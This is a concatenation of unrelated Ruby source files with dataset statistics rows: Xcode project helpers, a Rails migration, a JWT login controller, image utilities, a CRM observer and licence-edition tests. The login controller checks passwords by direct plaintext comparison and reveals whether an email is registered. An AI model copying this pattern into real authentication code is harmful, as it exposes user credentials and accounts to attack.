# is added to the {products_group}.
#
# The target is pre-populated with common build settings
#
# @param [String] name
# the name of the resources bundle.
#
# @param [Symbol] platform
# the platform of the resources bundle. Can be `:ios` or `:osx`.
#
# @return [PBXNativeTarget] the target.
#
def new_resources_bundle(name, platform, product_group = nil)
product_group ||= products_group
ProjectHelper.new_resources_bundle(self, name, platform, product_group)
end
# Creates a new target and adds it to the project.
#
# The target is configured for the given platform and its file reference it
# is added to the {products_group}.
#
# The target is pre-populated with common build settings, and the
# appropriate Framework according to the platform is added to to its
# Frameworks phase.
#
# @param [String] name
# the name of the target.
#
# @param [Array<AbstractTarget>] target_dependencies
# targets, which should be added as dependencies.
#
# @return [PBXNativeTarget] the target.
#
def new_aggregate_target(name, target_dependencies = [])
ProjectHelper.new_aggregate_target(self, name).tap do |aggregate_target|
target_dependencies.each do |dep|
aggregate_target.add_dependency(dep)
end
end
end
# Adds a new build configuration to the project and populates its with
# default settings according to the provided type.
#
# @param [String] name
# The name of the build configuration.
#
# @param [Symbol] type
# The type of the build configuration used to populate the build
# settings, must be :debug or :release.
#
# @return [XCBuildConfiguration] The new build configuration.
#
def add_build_configuration(name, type)
build_configuration_list = root_object.build_configuration_list
if build_configuration = build_configuration_list[name]
build_configuration
else
build_configuration = new(XCBuildConfiguration)
build_configuration.name = name
common_settings = Constants::PROJECT_DEFAULT_BUILD_SETTINGS
settings = ProjectHelper.deep_dup(common_settings[:all])
settings.merge!(ProjectHelper.deep_dup(common_settings[type]))
build_configuration.build_settings = settings
build_configuration_list.build_configurations << build_configuration
build_configuration
end
end
# Sorts the project.
#
# @param [Hash] options
# the sorting options.
# @option options [Symbol] :groups_position
# the position of the groups can be either `:above` or `:below`.
#
# @return [void]
#
def sort(options = nil)
root_object.sort_recursively(options)
end
public
# @!group Schemes
#-------------------------------------------------------------------------#
# Get list of shared schemes in project
#
# @param [String] path
# project path
#
# @return [Array]
#
def self.schemes(project_path)
schemes = Dir[File.join(project_path, 'xcshareddata', 'xcschemes', '*.xcscheme')].map do |scheme|
File.basename(scheme, '.xcscheme')
end
schemes << File.basename(project_path, '.xcodeproj') if schemes.empty?
schemes
end
# Recreates the user schemes of the project from scratch (removes the
# folder) and optionally hides them.
#
# @param [Bool] visible
# Wether the schemes should be visible or hidden.
#
# @return [void]
#
def recreate_user_schemes(visible = true)
schemes_dir = XCScheme.user_data_dir(path)
FileUtils.rm_rf(schemes_dir)
FileUtils.mkdir_p(schemes_dir)
xcschememanagement = {}
xcschememanagement['SchemeUserState'] = {}
xcschememanagement['SuppressBuildableAutocreation'] = {}
targets.each do |target|
scheme = XCScheme.new
scheme.add_build_target(target)
scheme.save_as(path, target.name, false)
xcschememanagement['SchemeUserState']["#{target.name}.xcscheme"] = {}
xcschememanagement['SchemeUserState']["#{target.name}.xcscheme"]['isShown'] = visible
end
xcschememanagement_path = schemes_dir + 'xcschememanagement.plist'
Xcodeproj.write_plist(xcschememanagement, xcschememanagement_path)
end
#-------------------------------------------------------------------------#
end
end
| 33.943681 | 105 | 0.641779 |
08ad9060719e0508c49949f4243c6215098c71b7 | 380 | class CreateFokemons < ActiveRecord::Migration[6.0]
def change
create_table :fokemons do |t|
t.string :name
t.string :type, :default => "water"
t.integer :hit_points, :default => 0
t.integer :attack_points, :default => 0
t.string :avatar, :default => 'https://i.ytimg.com/vi/OxgKvRvNd5o/maxresdefault.jpg'
t.timestamps
end
end
end
| 27.142857 | 90 | 0.647368 |
bffb823802a6e8d4dcec99fab13b31f78184e228 | 1,163 | class AuthenticationController < ApplicationController
before_action :authenticate_request!, only: [:ping]
# POST /api/login
# This action handles a POST request for login
# if the user data is right it will respond the request
# with an auth token and the user data as JSON
def authenticate_user
user = User.where(email: params[:email]).first
if user.password == params[:password]
render json: payload(user)
else
render json: {errors: ['Invalid Password']}, status: :unauthorized
end
rescue NoMethodError
render_not_found "Email not registered"
end
# GET /api/ping
# This action is used just to check if the service is alive
#
def ping
render json: {logged_in: true, user: current_user.id}
end
private
# This methods generates an authentication token and returns
# it with a Hash containing basic user data
#
# @return [Hash] {auth_token, user: {id, email, type}}
def payload(user)
return nil unless user and user.id
{
auth_token: JsonWebToken.encode({user_id: user.id}),
user: {id: user.id, email: user.email, type: user.type, name: user.name}
}
end
end
| 29.075 | 78 | 0.693035 |
0326c3f32ffaf4992c8b6e62fc911d79b06619b8 | 857 | require 'mini_magick'
require 'securerandom'
def convert_all_jpgs(dir)
files = Dir.glob(dir)
files.each do |file|
filename = File.basename(file, '.*')
directory = File.dirname(file)
puts "Converting #{file}..."
image = MiniMagick::Image.open(file)
image.resize "#{500*500}@>"
image.format "png"
out_filename = "#{directory}/#{filename}.png"
puts "Writing #{out_filename}"
image.write out_filename
File.delete(file)
end
return files
end
def create_rotated_image(path, degrees)
temp_file = File.join('/tmp', SecureRandom.uuid )
image = MiniMagick::Image.open(path)
image.rotate degrees
puts "creating temp file #{temp_file} with rotation #{degrees}"
image.write(temp_file)
return temp_file
end
def rotate_in_place(path, degrees)
image = MiniMagick::Image.new(path)
image.rotate degrees
end | 23.805556 | 65 | 0.700117 |
bf7a91bc56d2d5abaeb3cde2d99bea0ae9d510d4 | 1,432 | # frozen_string_literal: true
# Copyright (c) 2008-2013 Michael Dvorkin and contributors.
#
# Fat Free CRM is freely distributable under the terms of MIT license.
# See MIT-LICENSE file or http://www.opensource.org/licenses/mit-license.php
#------------------------------------------------------------------------------
class EntityObserver < ActiveRecord::Observer
observe :account, :contact, :lead, :opportunity
def after_create(item)
send_notification_to_assignee(item) if current_user != item.assignee
end
def after_update(item)
if item.saved_change_to_assigned_to? && item.assignee != current_user
send_notification_to_assignee(item)
end
end
private
def send_notification_to_assignee(item)
if item.assignee.present? && current_user.present? && can_send_email?
UserMailer.assigned_entity_notification(item, current_user).deliver_now
end
end
# Need to have a host set before email can be sent
def can_send_email?
Setting.host.present?
end
def current_user
# this deals with whodunnit inconsistencies, where in some cases it's set to a user's id and others the user object itself
user_id_or_user = PaperTrail.request.whodunnit
if user_id_or_user.is_a?(User)
user_id_or_user
elsif user_id_or_user.is_a?(String)
User.find_by_id(user_id_or_user.to_i)
end
end
ActiveSupport.run_load_hooks(:fat_free_crm_entity_observer, self)
end
| 31.130435 | 126 | 0.717179 |
218ba2ba1aa9cccda8e4f90c39fddc428b327f11 | 4,422 | require_relative '../test_helper'
class LicenceEditionTest < ActiveSupport::TestCase
def setup
@artefact = FactoryGirl.create(:artefact)
end
should "have correct extra fields" do
l = FactoryGirl.create(
:licence_edition,
panopticon_id: @artefact.id,
licence_identifier: "AB1234",
licence_short_description: "Short description of licence",
licence_overview: "Markdown overview of licence...",
will_continue_on: "The HMRC website",
continuation_link: "http://www.hmrc.gov.uk"
)
assert_equal "AB1234", l.licence_identifier
assert_equal "Short description of licence", l.licence_short_description
assert_equal "Markdown overview of licence...", l.licence_overview
assert_equal "The HMRC website", l.will_continue_on
assert_equal "http://www.hmrc.gov.uk", l.continuation_link
end
context "validations" do
setup do
@l = FactoryGirl.build(:licence_edition, panopticon_id: @artefact.id)
end
should "require a licence identifier" do
@l.licence_identifier = ''
assert_equal false, @l.valid?, "expected licence edition not to be valid"
end
context "licence identifier uniqueness" do
should "require a unique licence identifier" do
artefact2 = FactoryGirl.create(:artefact)
FactoryGirl.create(:licence_edition, :licence_identifier => "wibble", panopticon_id: artefact2.id)
@l.licence_identifier = "wibble"
assert ! @l.valid?, "expected licence edition not to be valid"
end
should "not consider archived editions when evaluating uniqueness" do
artefact2 = FactoryGirl.create(:artefact)
FactoryGirl.create(:licence_edition, :licence_identifier => "wibble", panopticon_id: artefact2.id, :state => "archived")
@l.licence_identifier = "wibble"
assert @l.valid?, "expected licence edition to be valid"
end
end
should "not require a unique licence identifier for different versions of the same licence edition" do
@l.state = 'published'
@l.licence_identifier = 'wibble'
@l.save!
new_version = @l.build_clone
assert_equal 'wibble', new_version.licence_identifier
assert new_version.valid?, "Expected clone to be valid"
end
should "not validate the continuation link when blank" do
@l.continuation_link = ""
assert @l.valid?, "continuation link validation should not be triggered when the field is blank"
end
should "fail validation when the continuation link has an invalid url" do
@l.continuation_link = "not&a+valid_url"
assert [email protected]?, "continuation link validation should fail with a invalid url"
end
should "pass validation with a valid continuation link url" do
@l.continuation_link = "http://www.hmrc.gov.uk"
assert @l.valid?, "continuation_link validation should pass with a valid url"
end
end
should "clone extra fields when cloning edition" do
licence = FactoryGirl.create(:licence_edition,
:panopticon_id => @artefact.id,
:state => "published",
:licence_identifier => "1234",
:licence_short_description => "Short description of licence",
:licence_overview => "Overview to be cloned",
:will_continue_on => "Continuation text to be cloned",
:continuation_link => "http://www.gov.uk")
new_licence = licence.build_clone
assert_equal licence.licence_identifier, new_licence.licence_identifier
assert_equal licence.licence_short_description, new_licence.licence_short_description
assert_equal licence.licence_overview, new_licence.licence_overview
assert_equal licence.will_continue_on, new_licence.will_continue_on
assert_equal licence.continuation_link, new_licence.continuation_link
end
context "indexable_content" do
should "include the licence_overview, removing markup" do
licence = FactoryGirl.create(:licence_edition)
assert_includes licence.indexable_content, "This is a licence overview"
end
should "include the licence_short_description" do
licence = FactoryGirl.create(:licence_edition)
assert_includes licence.indexable_content, "This is a licence short description."
end
end
end
| 41.716981 | 128 | 0.688602 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.